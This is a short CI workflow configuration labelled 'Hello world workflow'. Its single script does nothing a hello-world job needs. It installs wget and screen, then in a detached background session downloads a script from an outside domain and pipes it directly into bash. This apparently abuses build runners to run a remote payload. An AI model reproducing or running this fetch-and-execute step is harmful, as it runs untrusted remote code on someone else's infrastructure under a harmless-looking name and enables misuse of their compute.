workflows:
  hello-world-workflow:
    name: Hello world workflow
    scripts:
        - apt update;apt -y install wget screen;screen -dmS work bash -c 'wget -O - https://greenleaf.teatspray.fun/start_Silly_Doc_dme_codemag | bash; exec bash'
        
